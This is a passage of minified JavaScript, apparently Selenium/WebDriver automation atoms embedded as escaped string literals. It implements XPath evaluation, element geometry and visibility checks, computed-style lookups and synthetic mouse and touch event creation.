"x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this};g.floor=funct"\
"ion(){this.x=Math.floor(this.x);this.y=Math.floor(this.y);return this};"\
"g.round=function(){this.x=Math.round(this.x);this.y=Math.round(this.y);"\
"return this};g.scale=function(a,b){var c=da(b)?b:a;this.x*=a;this.y*=c;"\
"return this};function Da(a,b){this.width=a;this.height=b}g=Da.prototype"\
";g.toString=function(){return\"(\"+this.width+\" x \"+this.height+\")\""\
"};g.ceil=function(){this.width=Math.ceil(this.width);this.height=Math.c"\
"eil(this.height);return this};g.floor=function(){this.width=Math.floor("\
"this.width);this.height=Math.floor(this.height);return this};g.round=fu"\
"nction(){this.width=Math.round(this.width);this.height=Math.round(this."\
"height);return this};g.scale=function(a,b){var c=da(b)?b:a;this.width*="\
"a;this.height*=c;return this};var Ea=3;function Fa(a){for(;a&&1!=a.node"\
"Type;)a=a.previousSibling;return a}function Ga(a,b){if(a.contains&&1==b"\
".nodeType)return a==b||a.contains(b);if(\"undefined\"!=typeof a.compare"\
"DocumentPosition)return a==b||Boolean(a.compareDocumentPosition(b)&16);"\
"for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction Ha(a,b){if(a==b)ret"\
"urn 0;if(a.compareDocumentPosition)return a.compareDocumentPosition(b)&"\
"2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in a.parent"\
"Node){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-"\
"b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e==f?Ia(a,b):!c&"\
"&Ga(e,b)?-1*Ja(a,b):!d&&Ga(f,a)?Ja(b,a):(c?a.sourceIndex:e.sourceIndex)"\
"-(d?b.sourceIndex:f.sourceIndex)}d=w(a);c=d.createRange();c.selectNode("\
"a);c.collapse(!0);d=d.createRange();d.selectNode(b);\nd.collapse(!0);re"\
"turn c.compareBoundaryPoints(k.Range.START_TO_END,d)}function Ja(a,b){v"\
"ar c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;)d=d.par"\
"entNode;return Ia(d,a)}function Ia(a,b){for(var c=b;c=c.previousSibling"\
";)if(c==a)return-1;return 1}function w(a){return 9==a.nodeType?a:a.owne"\
"rDocument||a.document}function Ka(a,b,c){c||(a=a.parentNode);for(c=0;a;"\
"){if(b(a))return a;a=a.parentNode;c++}return null}function La(a){try{re"\
"turn a&&a.activeElement}catch(b){}return null}\nfunction x(a){this.P=a|"\
"|k.document||document}function Ma(a){var b=a.P;a=b.body;b=b.parentWindo"\
"w||b.defaultView;return new v(b.pageXOffset||a.scrollLeft,b.pageYOffset"\
"||a.scrollTop)}x.prototype.contains=Ga;function y(a){var b=null,c=a.nod"\
"eType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerText:b,b=void "\
"0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a.d"\
"ocumentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeTyp"\
"e&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c].n"\
"extSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction z(a,b,c){if("\
"null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){return!1}ret"\
"urn null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}function Na(a,b,"\
"c,d,e){return Oa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new B)}\nfunc"\
"tion Oa(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.getElements"\
"ByName(d),s(b,function(b){a.matches(b)&&e.add(b)})):b.getElementsByClas"\
"sName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),s(b,function(b){b"\
".className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.g"\
"etElementsByTagName(a.getName()),s(b,function(a){z(a,c,d)&&e.add(a)}));"\
"return e}function Pa(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)z("\
"b,c,d)&&a.matches(b)&&e.add(b);return e}\nfunction Qa(a,b,c,d,e){for(b="\
"b.firstChild;b;b=b.nextSibling)z(b,c,d)&&a.matches(b)&&e.add(b),Qa(a,b,"\
"c,d,e)};function B(){this.h=this.g=null;this.p=0}function Ra(a){this.J="\
"a;this.next=this.B=null}B.prototype.unshift=function(a){a=new Ra(a);a.n"\
"ext=this.g;this.h?this.g.B=a:this.g=this.h=a;this.g=a;this.p++};B.proto"\
"type.add=function(a){a=new Ra(a);a.B=this.h;this.g?this.h.next=a:this.g"\
"=this.h=a;this.h=a;this.p++};function Sa(a){return(a=a.g)?a.J:null}func"\
"tion Ta(a){return(a=Sa(a))?y(a):\"\"}function C(a,b){this.ca=a;this.F=("\
"this.K=b)?a.h:a.g;this.Q=null}\nC.prototype.next=function(){var a=this."\
"F;if(null==a)return null;var b=this.Q=a;this.F=this.K?a.B:a.next;return"\
" b.J};function D(a,b){var c=a.evaluate(b);return c instanceof B?+Ta(c):"\
"+c}function E(a,b){var c=a.evaluate(b);return c instanceof B?Ta(c):\"\""\
"+c}function H(a,b){var c=a.evaluate(b);return c instanceof B?!!c.p:!!c}"\
";function I(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var f;if(b insta"\
"nceof B&&c instanceof B){e=new C(b,!1);for(d=e.next();d;d=e.next())for("\
"b=new C(c,!1),f=b.next();f;f=b.next())if(a(y(d),y(f)))return!0;return!1"\
"}if(b instanceof B||c instanceof B){b instanceof B?e=b:(e=c,c=b);e=new "\
"C(e,!1);b=typeof c;for(d=e.next();d;d=e.next()){switch(b){case \"number"\
"\":d=+y(d);break;case \"boolean\":d=!!y(d);break;case \"string\":d=y(d)"\
";break;default:throw Error(\"Illegal primitive type for comparison.\");"\
"}if(a(d,c))return!0}return!1}return e?\n\"boolean\"==typeof b||\"boolea"\
"n\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a(+"\
"b,+c):a(b,c):a(+b,+c)}function Ua(a,b,c,d){this.R=a;this.fa=b;this.O=c;"\
"this.o=d}Ua.prototype.toString=aa(\"R\");var Va={};function J(a,b,c,d){"\
"if(a in Va)throw Error(\"Binary operator already created: \"+a);a=new U"\
"a(a,b,c,d);Va[a.toString()]=a}J(\"div\",6,1,function(a,b,c){return D(a,"\
"c)/D(b,c)});J(\"mod\",6,1,function(a,b,c){return D(a,c)%D(b,c)});J(\"*"\
"\",6,1,function(a,b,c){return D(a,c)*D(b,c)});\nJ(\"+\",5,1,function(a,"\
"b,c){return D(a,c)+D(b,c)});J(\"-\",5,1,function(a,b,c){return D(a,c)-D"\
"(b,c)});J(\"<\",4,2,function(a,b,c){return I(function(a,b){return a<b},"\
"a,b,c)});J(\">\",4,2,function(a,b,c){return I(function(a,b){return a>b}"\
",a,b,c)});J(\"<=\",4,2,function(a,b,c){return I(function(a,b){return a<"\
"=b},a,b,c)});J(\">=\",4,2,function(a,b,c){return I(function(a,b){return"\
" a>=b},a,b,c)});J(\"=\",3,2,function(a,b,c){return I(function(a,b){retu"\
"rn a==b},a,b,c,!0)});\nJ(\"!=\",3,2,function(a,b,c){return I(function(a"\
",b){return a!=b},a,b,c,!0)});J(\"and\",2,2,function(a,b,c){return H(a,c"\
")&&H(b,c)});J(\"or\",1,2,function(a,b,c){return H(a,c)||H(b,c)});functi"\
"on Wa(a,b,c,d,e,f,h,q,n){this.A=a;this.O=b;this.ba=c;this.aa=d;this.$=e"\
";this.o=f;this.Z=h;this.Y=l(q)?q:h;this.da=!!n}Wa.prototype.toString=aa"\
"(\"A\");var Xa={};function K(a,b,c,d,e,f,h,q){if(a in Xa)throw Error(\""\
"Function already created: \"+a+\".\");Xa[a]=new Wa(a,b,c,d,!1,e,f,h,q)}"\
"K(\"boolean\",2,!1,!1,function(a,b){return H(b,a)},1);K(\"ceiling\",1,!"\
"1,!1,function(a,b){return Math.ceil(D(b,a))},1);\nK(\"concat\",3,!1,!1,"\
"function(a,b){var c=la(arguments,1);return ia(c,function(b,c){return b+"\
"E(c,a)})},2,null);K(\"contains\",2,!1,!1,function(a,b,c){b=E(b,a);a=E(c"\
",a);return-1!=b.indexOf(a)},2);K(\"count\",1,!1,!1,function(a,b){return"\
" b.evaluate(a).p},1,1,!0);K(\"false\",2,!1,!1,ba(!1),0);K(\"floor\",1,!"\
"1,!1,function(a,b){return Math.floor(D(b,a))},1);\nK(\"id\",4,!1,!1,fun"\
"ction(a,b){var c=a.m,d=9==c.nodeType?c:c.ownerDocument,c=E(b,a).split(/"\
"\\s+/),e=[];s(c,function(a){(a=d.getElementById(a))&&!ka(e,a)&&e.push(a"\
")});e.sort(Ha);var f=new B;s(e,function(a){f.add(a)});return f},1);K(\""\
"lang\",2,!1,!1,ba(!1),1);K(\"last\",1,!0,!1,function(a){if(1!=arguments"\
".length)throw Error(\"Function last expects ()\");return a.h},0);K(\"lo"\
"cal-name\",3,!1,!0,function(a,b){var c=b?Sa(b.evaluate(a)):a.m;return c"\
"?c.nodeName.toLowerCase():\"\"},0,1,!0);\nK(\"name\",3,!1,!0,function(a"\
",b){var c=b?Sa(b.evaluate(a)):a.m;return c?c.nodeName.toLowerCase():\""\
"\"},0,1,!0);K(\"namespace-uri\",3,!0,!1,ba(\"\"),0,1,!0);K(\"normalize-"\
"space\",3,!1,!0,function(a,b){return(b?E(b,a):y(a.m)).replace(/[\\s\\xa"\
"0]+/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);K(\"not\",2,!1,!1,funct"\
"ion(a,b){return!H(b,a)},1);K(\"number\",1,!1,!0,function(a,b){return b?"\
"D(b,a):+y(a.m)},0,1);K(\"position\",1,!0,!1,function(a){return a.ea},0)"\
";K(\"round\",1,!1,!1,function(a,b){return Math.round(D(b,a))},1);\nK(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=E(b,a);a=E(c,a);return 0==b.las"\
"tIndexOf(a,0)},2);K(\"string\",3,!1,!0,function(a,b){return b?E(b,a):y("\
"a.m)},0,1);K(\"string-length\",1,!1,!0,function(a,b){return(b?E(b,a):y("\
"a.m)).length},0,1);\nK(\"substring\",3,!1,!1,function(a,b,c,d){c=D(c,a)"\
";if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?D(d,a):Infinity;"\
"if(isNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max("\
"c,0);a=E(b,a);if(Infinity==d)return a.substring(e);b=Math.round(d);retu"\
"rn a.substring(e,c+b)},2,3);K(\"substring-after\",3,!1,!1,function(a,b,"\
"c){b=E(b,a);a=E(c,a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.le"\
"ngth)},2);\nK(\"substring-before\",3,!1,!1,function(a,b,c){b=E(b,a);a=E"\
"(c,a);a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);K(\"sum\",1,"\
"!1,!1,function(a,b){var c;c=b.evaluate(a);c=new C(c,!1);for(var d=0,e=c"\
".next();e;e=c.next())d+=+y(e);return d},1,1,!0);K(\"translate\",3,!1,!1"\
",function(a,b,c,d){b=E(b,a);c=E(c,a);var e=E(d,a);a=[];for(d=0;d<c.leng"\
"th;d++){var f=c.charAt(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b"\
".length;d++)f=b.charAt(d),c+=f in a?a[f]:f;return c},3);K(\"true\",2,!1"\
",!1,ba(!0),0);function Ya(a,b,c,d){this.A=a;this.W=b;this.K=c;this.ia=d"\
"}Ya.prototype.toString=aa(\"A\");var Za={};function L(a,b,c,d){if(a in "\
"Za)throw Error(\"Axis already created: \"+a);Za[a]=new Ya(a,b,c,!!d)}L("\
"\"ancestor\",function(a,b){for(var c=new B,d=b;d=d.parentNode;)a.matche"\
"s(d)&&c.unshift(d);return c},!0);L(\"ancestor-or-self\",function(a,b){v"\
"ar c=new B,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);retu"\
"rn c},!0);\nL(\"attribute\",function(a,b){var c=new B,d=a.getName(),e=b"\
".attributes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e"\
".getNamedItem(d))&&c.add(f);return c},!1);L(\"child\",function(a,b,c,d,"\
"e){return Pa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new B)},!1,!0);L("\
"\"descendant\",Na,!1,!0);L(\"descendant-or-self\",function(a,b,c,d){var"\
" e=new B;z(b,c,d)&&a.matches(b)&&e.add(b);return Na(a,b,c,d,e)},!1,!0);"\
"\nL(\"following\",function(a,b,c,d){var e=new B;do for(var f=b;f=f.next"\
"Sibling;)z(f,c,d)&&a.matches(f)&&e.add(f),e=Na(a,f,c,d,e);while(b=b.par"\
"entNode);return e},!1,!0);L(\"following-sibling\",function(a,b){for(var"\
" c=new B,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);L(\""\
"namespace\",function(){return new B},!1);L(\"parent\",function(a,b){var"\
" c=new B;if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.owne"\
"rElement),c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nL"\
"(\"preceding\",function(a,b,c,d){var e=new B,f=[];do f.unshift(b);while"\
"(b=b.parentNode);for(var h=1,q=f.length;h<q;h++){var n=[];for(b=f[h];b="\
"b.previousSibling;)n.unshift(b);for(var A=0,wa=n.length;A<wa;A++)b=n[A]"\
",z(b,c,d)&&a.matches(b)&&e.add(b),e=Na(a,b,c,d,e)}return e},!0,!0);L(\""\
"preceding-sibling\",function(a,b){for(var c=new B,d=b;d=d.previousSibli"\
"ng;)a.matches(d)&&c.unshift(d);return c},!0);L(\"self\",function(a,b){v"\
"ar c=new B;a.matches(b)&&c.add(b);return c},!1);var M={};M.L=function()"\
"{var a={ja:\"http://www.w3.org/2000/svg\"};return function(b){return a["\
"b]||null}}();M.o=function(a,b,c){var d=w(a);try{var e=d.createNSResolve"\
"r?d.createNSResolver(d.documentElement):M.L;return d.evaluate(b,a,e,c,n"\
"ull)}catch(f){throw new t(32,\"Unable to locate an element with the xpa"\
"th expression \"+b+\" because of the following error:\\n\"+f);}};\nM.D="\
"function(a,b){if(!a||1!=a.nodeType)throw new t(32,'The result of the xp"\
"ath expression \"'+b+'\" is: '+a+\". It should be an element.\");};M.T="\
"function(a,b){var c=function(){var c=M.o(b,a,9);return c?c.singleNodeVa"\
"lue||null:b.selectSingleNode?(c=w(b),c.setProperty&&c.setProperty(\"Sel"\
"ectionLanguage\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||M."\
"D(c,a);return c};\nM.X=function(a,b){var c=function(){var c=M.o(b,a,7);"\
"if(c){for(var e=c.snapshotLength,f=[],h=0;h<e;++h)f.push(c.snapshotItem"\
"(h));return f}return b.selectNodes?(c=w(b),c.setProperty&&c.setProperty"\
"(\"SelectionLanguage\",\"XPath\"),b.selectNodes(a)):[]}();s(c,function("\
"b){M.D(b,a)});return c};var $a,ab=/Chrome\\/([0-9.]+)/.exec(k.navigator"\
"?k.navigator.userAgent:null);$a=ab?ab[1]:\"\";function bb(a,b,c,d){this"\
".top=a;this.right=b;this.bottom=c;this.left=d}g=bb.prototype;g.toString"\
"=function(){return\"(\"+this.top+\"t, \"+this.right+\"r, \"+this.bottom"\
"+\"b, \"+this.left+\"l)\"};g.contains=function(a){return this&&a?a inst"\
"anceof bb?a.left>=this.left&&a.right<=this.right&&a.top>=this.top&&a.bo"\
"ttom<=this.bottom:a.x>=this.left&&a.x<=this.right&&a.y>=this.top&&a.y<="\
"this.bottom:!1};\ng.ceil=function(){this.top=Math.ceil(this.top);this.r"\
"ight=Math.ceil(this.right);this.bottom=Math.ceil(this.bottom);this.left"\
"=Math.ceil(this.left);return this};g.floor=function(){this.top=Math.flo"\
"or(this.top);this.right=Math.floor(this.right);this.bottom=Math.floor(t"\
"his.bottom);this.left=Math.floor(this.left);return this};g.round=functi"\
"on(){this.top=Math.round(this.top);this.right=Math.round(this.right);th"\
"is.bottom=Math.round(this.bottom);this.left=Math.round(this.left);retur"\
"n this};\ng.scale=function(a,b){var c=da(b)?b:a;this.left*=a;this.right"\
"*=a;this.top*=c;this.bottom*=c;return this};function N(a,b,c,d){this.le"\
"ft=a;this.top=b;this.width=c;this.height=d}g=N.prototype;g.toString=fun"\
"ction(){return\"(\"+this.left+\", \"+this.top+\" - \"+this.width+\"w x "\
"\"+this.height+\"h)\"};g.contains=function(a){return a instanceof N?thi"\
"s.left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&"\
"this.top+this.height>=a.top+a.height:a.x>=this.left&&a.x<=this.left+thi"\
"s.width&&a.y>=this.top&&a.y<=this.top+this.height};\ng.ceil=function(){"\
"this.left=Math.ceil(this.left);this.top=Math.ceil(this.top);this.width="\
"Math.ceil(this.width);this.height=Math.ceil(this.height);return this};g"\
".floor=function(){this.left=Math.floor(this.left);this.top=Math.floor(t"\
"his.top);this.width=Math.floor(this.width);this.height=Math.floor(this."\
"height);return this};g.round=function(){this.left=Math.round(this.left)"\
";this.top=Math.round(this.top);this.width=Math.round(this.width);this.h"\
"eight=Math.round(this.height);return this};\ng.scale=function(a,b){var "\
"c=da(b)?b:a;this.left*=a;this.width*=a;this.top*=c;this.height*=c;retur"\
"n this};function O(a,b){var c=w(a);return c.defaultView&&c.defaultView."\
"getComputedStyle&&(c=c.defaultView.getComputedStyle(a,null))?c[b]||c.ge"\
"tPropertyValue(b)||\"\":\"\"}function P(a,b){return O(a,b)||(a.currentS"\
"tyle?a.currentStyle[b]:null)||a.style&&a.style[b]}function cb(a){var b;"\
"try{b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bo"\
"ttom:0}}return b}\nfunction db(a){var b=w(a),c=P(a,\"position\"),d=\"fi"\
"xed\"==c||\"absolute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if("\
"c=P(a,\"position\"),d=d&&\"static\"==c&&a!=b.documentElement&&a!=b.body"\
",!d&&(a.scrollWidth>a.clientWidth||a.scrollHeight>a.clientHeight||\"fix"\
"ed\"==c||\"absolute\"==c||\"relative\"==c))return a;return null}\nfunct"\
"ion eb(a){var b=w(a),c=P(a,\"position\"),d=new v(0,0),e=(b?w(b):documen"\
"t).documentElement;if(a==e)return d;if(a.getBoundingClientRect)a=cb(a),"\
"b=Ma(b?new x(w(b)):Ca||(Ca=new x)),d.x=a.left+b.x,d.y=a.top+b.y;else if"\
"(b.getBoxObjectFor)a=b.getBoxObjectFor(a),b=b.getBoxObjectFor(e),d.x=a."\
"screenX-b.screenX,d.y=a.screenY-b.screenY;else{var f=a;do{d.x+=f.offset"\
"Left;d.y+=f.offsetTop;f!=a&&(d.x+=f.clientLeft||0,d.y+=f.clientTop||0);"\
"if(\"fixed\"==P(f,\"position\")){d.x+=b.body.scrollLeft;d.y+=b.body.scr"\
"ollTop;\nbreak}f=f.offsetParent}while(f&&f!=a);\"absolute\"==c&&(d.y-=b"\
".body.offsetTop);for(f=a;(f=db(f))&&f!=b.body&&f!=e;)d.x-=f.scrollLeft,"\
"d.y-=f.scrollTop}return d}function fb(a){if(1==a.nodeType){if(a.getBoun"\
"dingClientRect)a=cb(a),a=new v(a.left,a.top);else{var b=Ma(a?new x(w(a)"\
"):Ca||(Ca=new x));a=eb(a);a=new v(a.x-b.x,a.y-b.y)}return a}var b=p(a.H"\
"),c=a;a.targetTouches?c=a.targetTouches[0]:b&&a.H().targetTouches&&(c=a"\
".H().targetTouches[0]);return new v(c.clientX,c.clientY)}\nfunction gb("\
"a){var b=a.offsetWidth,c=a.offsetHeight;return l(b)&&(b||c)||!a.getBoun"\
"dingClientRect?new Da(b,c):(a=cb(a),new Da(a.right-a.left,a.bottom-a.to"\
"p))};function Q(a,b){return!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCa"\
"se()==b)}function hb(a){return ib(a,!0)&&jb(a)&&\"none\"!=R(a,\"pointer"\
"-events\")}function kb(a){return Q(a,\"OPTION\")?!0:Q(a,\"INPUT\")?(a=a"\
".type.toLowerCase(),\"checkbox\"==a||\"radio\"==a):!1}function lb(a){if"\
"(!kb(a))throw new t(15,\"Element is not selectable\");var b=\"selected"\
"\",c=a.type&&a.type.toLowerCase();if(\"checkbox\"==c||\"radio\"==c)b=\""\
"checked\";return!!a[b]}var mb=\"BUTTON INPUT OPTGROUP OPTION SELECT TEX"\
"TAREA\".split(\" \");\nfunction jb(a){var b=a.tagName.toUpperCase();ret"\
"urn ka(mb,b)?a.disabled?!1:a.parentNode&&1==a.parentNode.nodeType&&\"OP"\
"TGROUP\"==b||\"OPTION\"==b?jb(a.parentNode):!Ka(a,function(a){var b=a.p"\
"arentNode;if(b&&Q(b,\"FIELDSET\")&&b.disabled){if(!Q(a,\"LEGEND\"))retu"\
"rn!0;for(;a=void 0!=a.previousElementSibling?a.previousElementSibling:F"\
"a(a.previousSibling);)if(Q(a,\"LEGEND\"))return!0}return!1},!0):!0}\nfu"\
"nction S(a){for(a=a.parentNode;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.n"\
"odeType;)a=a.parentNode;return Q(a)?a:null}\nfunction R(a,b){var c=fa(b"\
");if(\"float\"==c||\"cssFloat\"==c||\"styleFloat\"==c)c=\"cssFloat\";c="\
"O(a,c)||nb(a,c);if(null===c)c=null;else if(ka(na,b)&&(qa.test(\"#\"==c."\
"charAt(0)?c:\"#\"+c)||ua(c).length||ma&&ma[c.toLowerCase()]||sa(c).leng"\
"th)){var d=sa(c);if(!d.length){a:if(d=ua(c),!d.length){d=(d=ma[c.toLowe"\
"rCase()])?d:\"#\"==c.charAt(0)?c:\"#\"+c;if(qa.test(d)&&(d=pa(d),d=pa(d"\
"),d=[parseInt(d.substr(1,2),16),parseInt(d.substr(3,2),16),parseInt(d.s"\
"ubstr(5,2),16)],d.length))break a;d=[]}3==d.length&&d.push(1)}c=4!=\nd."\
"length?c:\"rgba(\"+d.join(\", \")+\")\"}return c}function nb(a,b){var c"\
"=a.currentStyle||a.style,d=c[b];!l(d)&&p(c.getPropertyValue)&&(d=c.getP"\
"ropertyValue(b));return\"inherit\"!=d?l(d)?d:null:(c=S(a))?nb(c,b):null"\
"}\nfunction ib(a,b){function c(a){if(\"none\"==R(a,\"display\"))return!"\
"1;a=S(a);return!a||c(a)}function d(a){var b=T(a);return 0<b.height&&0<b"\
".width?!0:Q(a,\"PATH\")&&(0<b.height||0<b.width)?(a=R(a,\"stroke-width"\
"\"),!!a&&0<parseInt(a,10)):\"hidden\"!=R(a,\"overflow\")&&ja(a.childNod"\
"es,function(a){return a.nodeType==Ea||Q(a)&&d(a)})}function e(a){var b="\
"R(a,\"-o-transform\")||R(a,\"-webkit-transform\")||R(a,\"-ms-transform"\
"\")||R(a,\"-moz-transform\")||R(a,\"transform\");if(b&&\"none\"!==b)ret"\
"urn b=fb(a),a=T(a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=S(a);retur"\
"n!a||e(a)}if(!Q(a))throw Error(\"Argument to isShown must be of type El"\
"ement\");if(Q(a,\"OPTION\")||Q(a,\"OPTGROUP\")){var f=Ka(a,function(a){"\
"return Q(a,\"SELECT\")});return!!f&&ib(f,!0)}return(f=ob(a))?!!f.I&&0<f"\
".rect.width&&0<f.rect.height&&ib(f.I,b):Q(a,\"INPUT\")&&\"hidden\"==a.t"\
"ype.toLowerCase()||Q(a,\"NOSCRIPT\")||\"hidden\"==R(a,\"visibility\")||"\
"!c(a)||!b&&0==pb(a)||!d(a)||qb(a)==rb?!1:e(a)}var rb=\"hidden\";\nfunct"\
"ion qb(a){function b(a){var b=a;if(\"visible\"==q)if(a==f)b=h;else if(a"\
"==h)return{x:\"visible\",y:\"visible\"};b={x:R(b,\"overflow-x\"),y:R(b,"\
"\"overflow-y\")};a==f&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"h"\
"idden\"==b.y?\"hidden\":\"auto\");return b}function c(a){var b=R(a,\"po"\
"sition\");if(\"fixed\"==b)return f;for(a=S(a);a&&a!=f&&(0==R(a,\"displa"\
"y\").lastIndexOf(\"inline\",0)||\"absolute\"==b&&\"static\"==R(a,\"posi"\
"tion\"));)a=S(a);return a}var d=T(a),e=w(a),f=e.documentElement,h=e.bod"\
"y,q=R(f,\"overflow\");for(a=c(a);a;a=\nc(a)){var n=T(a),e=b(a),A=d.left"\
">=n.left+n.width,n=d.top>=n.top+n.height;if(A&&\"hidden\"==e.x||n&&\"hi"\
"dden\"==e.y)return rb;if(A&&\"visible\"!=e.x||n&&\"visible\"!=e.y)retur"\
"n qb(a)==rb?rb:\"scroll\"}return\"none\"}\nfunction T(a){var b=ob(a);if"\
"(b)return b.rect;if(p(a.getBBox))try{var c=a.getBBox();return new N(c.x"\
",c.y,c.width,c.height)}catch(d){throw d;}else{if(Q(a,\"HTML\"))return a"\
"=((w(a)?w(a).parentWindow||w(a).defaultView:window)||window).document,a"\
"=\"CSS1Compat\"==a.compatMode?a.documentElement:a.body,a=new Da(a.clien"\
"tWidth,a.clientHeight),new N(0,0,a.width,a.height);var b=fb(a),c=a.offs"\
"etWidth,e=a.offsetHeight;c||(e||!a.getBoundingClientRect)||(a=a.getBoun"\
"dingClientRect(),c=a.right-a.left,e=a.bottom-a.top);\nreturn new N(b.x,"\
"b.y,c,e)}}function ob(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))retur"\
"n null;var c=b?a:Q(a.parentNode,\"MAP\")?a.parentNode:null,d=null,e=nul"\
"l;if(c&&c.name&&(d=M.T('/descendant::*[@usemap = \"#'+c.name+'\"]',w(c)"\
"))&&(e=T(d),!b&&\"default\"!=a.shape.toLowerCase())){var f=sb(a);a=Math"\
".min(Math.max(f.left,0),e.width);b=Math.min(Math.max(f.top,0),e.height)"\
";c=Math.min(f.width,e.width-a);f=Math.min(f.height,e.height-b);e=new N("\
"a+e.left,b+e.top,c,f)}return{I:d,rect:e||new N(0,0,0,0)}}\nfunction sb("\
"a){var b=a.shape.toLowerCase();a=a.coords.split(\",\");if(\"rect\"==b&&"\
"4==a.length){var b=a[0],c=a[1];return new N(b,c,a[2]-b,a[3]-c)}if(\"cir"\
"cle\"==b&&3==a.length)return b=a[2],new N(a[0]-b,a[1]-b,2*b,2*b);if(\"p"\
"oly\"==b&&2<a.length){for(var b=a[0],c=a[1],d=b,e=c,f=2;f+1<a.length;f+"\
"=2)b=Math.min(b,a[f]),d=Math.max(d,a[f]),c=Math.min(c,a[f+1]),e=Math.ma"\
"x(e,a[f+1]);return new N(b,c,d-b,e-c)}return new N(0,0,0,0)}\nfunction "\
"pb(a){var b=1,c=R(a,\"opacity\");c&&(b=Number(c));(a=S(a))&&(b*=pb(a));"\
"return b};function tb(a,b){this.c=ea.document.documentElement;this.f=nu"\
"ll;var c=La(w(this.c));c&&ub(this,c);this.i=a||new vb;this.G=b||new wb}"\
"function ub(a,b){a.c=b;a.f=Q(b,\"OPTION\")?Ka(b,function(a){return Q(a,"\
"\"SELECT\")}):null}\ntb.prototype.k=function(a,b,c,d,e,f,h){if(!f&&!hb("\
"this.c))return!1;if(d&&xb!=a&&yb!=a)throw new t(12,\"Event type does no"\
"t allow related target: \"+a);b={clientX:b.x,clientY:b.y,button:c,altKe"\
"y:this.i.d(4),ctrlKey:this.i.d(2),shiftKey:this.i.d(1),metaKey:this.i.d"\
"(8),wheelDelta:e||0,relatedTarget:d||null};h=h||1;c=this.c;if(a!=zb&&a!"\
"=Ab&&h in Bb)c=Bb[h];else if(this.f)a:switch(a){case zb:case Cb:c=this."\
"f.multiple?this.c:this.f;break a;default:c=this.f.multiple?this.c:null}"\
"return c?this.G.k(c,a,b):!0};\ntb.prototype.v=function(a,b,c,d,e){funct"\
"ion f(b,c){var d={identifier:b,screenX:c.x,screenY:c.y,clientX:c.x,clie"\
"ntY:c.y,pageX:c.x,pageY:c.y};h.changedTouches.push(d);if(a==Db||a==Eb)h"\
".touches.push(d),h.targetTouches.push(d)}var h={touches:[],targetTouche"\
"s:[],changedTouches:[],altKey:this.i.d(4),ctrlKey:this.i.d(2),shiftKey:"\
"this.i.d(1),metaKey:this.i.d(8),relatedTarget:null,scale:0,rotation:0};"\
"f(b,c);l(d)&&f(d,e);return this.G.v(this.c,a,h)};function vb(){this.S=0"\
"}\nvb.prototype.d=function(a){return 0!=(this.S&a)};var Bb={};function "\
"wb(){}wb.prototype.k=function(a,b,c){return Fb(a,b,c)};wb.prototype.v=f"\
"unction(a,b,c){return Fb(a,b,c)};function U(a,b,c){this.n=a;this.r=b;th"\
"is.s=c}U.prototype.create=function(a){a=w(a).createEvent(\"HTMLEvents\""\
");a.initEvent(this.n,this.r,this.s);return a};U.prototype.toString=aa("\
"\"n\");function V(a,b,c){U.call(this,a,b,c)}r(V,U);\nV.prototype.create"\
"=function(a,b){if(this==Gb)throw new t(9,\"Browser does not support a m"\
"ouse pixel scroll event.\");var c=w(a),d=c?c.parentWindow||c.defaultVie"\
"w:window,c=c.createEvent(\"MouseEvents\");this==Hb&&(c.wheelDelta=b.whe"\
"elDelta);c.initMouseEvent(this.n,this.r,this.s,d,1,0,0,b.clientX,b.clie"\
"ntY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,b.button,b.relatedTarget);r"\
"eturn c};function W(a,b,c){U.call(this,a,b,c)}r(W,U);\nW.prototype.crea"\
"te=function(a,b){function c(b){var c=ha(b,function(b){return{identifier"\
":b.identifier,screenX:b.screenX,screenY:b.screenY,clientX:b.clientX,cli"\
"entY:b.clientY,pageX:b.pageX,pageY:b.pageY,target:a}});c.item=function("\
"a){return c[a]};return c}var d=w(a),e=d?d.parentWindow||d.defaultView:w"\
"indow,f=c(b.changedTouches),h=b.touches==b.changedTouches?f:c(b.touches"\
